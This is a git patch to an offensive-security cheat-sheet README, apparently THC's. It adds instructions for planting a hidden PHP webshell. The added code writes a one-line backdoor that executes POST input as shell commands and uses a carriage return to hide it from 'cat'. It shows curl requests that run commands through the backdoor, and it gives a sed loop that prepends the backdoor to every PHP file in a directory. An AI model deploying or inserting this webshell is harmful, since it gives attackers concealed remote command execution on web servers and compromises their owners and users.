From 4e203585176cdc4a3706eaeffb32cc662d72fe66 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 16 May 2023 18:59:04 +0100
Subject: [PATCH] Update README.md

---
 README.md | 26 +++++++++++++++++++++++---
 1 file changed, 23 insertions(+), 3 deletions(-)

diff --git a/README.md b/README.md
index 826c949..e42deb9 100644
--- a/README.md
+++ b/README.md
@@ -1040,10 +1040,30 @@ Other methods:
 
 Hide from `cat` with a [simple carriage return](https://www.hahwul.com/2019/01/23/php-hidden-webshell-with-carriage/): 
 ```sh
-echo -e "<?php if(isset(\$_POST[0])){\`\$_POST[0]\`;} ?>\r<?php echo \"hello world\"; echo \" this is a test\"; ?>" > /var/www/html/test.php
-###
-curl http://192.168.0.1/test.php -d 1="id; uname -mrs"
+### The first line will be hidden from cat
+cd /var/www/html
+echo '<?php if(isset($_POST[0])){echo `$_POST[0]`; exit;} ?>'$'\r''<?php echo "Hello THC was here...."; ?>' >test.php
 ```
+Note the `$'\r'`: It will move the cursor back and then overwrite with the following line.
+
+Test the backdoor:
+```sh
+### 1. Optional: Start a test PHP server
+cd /var/www/html && php -S 127.0.0.1:8080
+### Without executing a command
+curl http://127.0.0.1:8080/test.php
+### With executing a command
+curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
+```
+Alternatively add ``<?php if(isset($_POST[0])){echo `$_POST[0]`; exit;} ?>`` to the beginning of any existing PHP page:
+
+```sh
+for f in *.php; do
+   sed -i '1s/^/<?php if(isset($_POST[0])){echo `$_POST[0]`; exit;} ?>\r/' "$f"
+   echo "Backdoored: '$f'"
+done
+```
+
 ---
 <a id="shell-hacks"></a>
 ## 7. Shell Hacks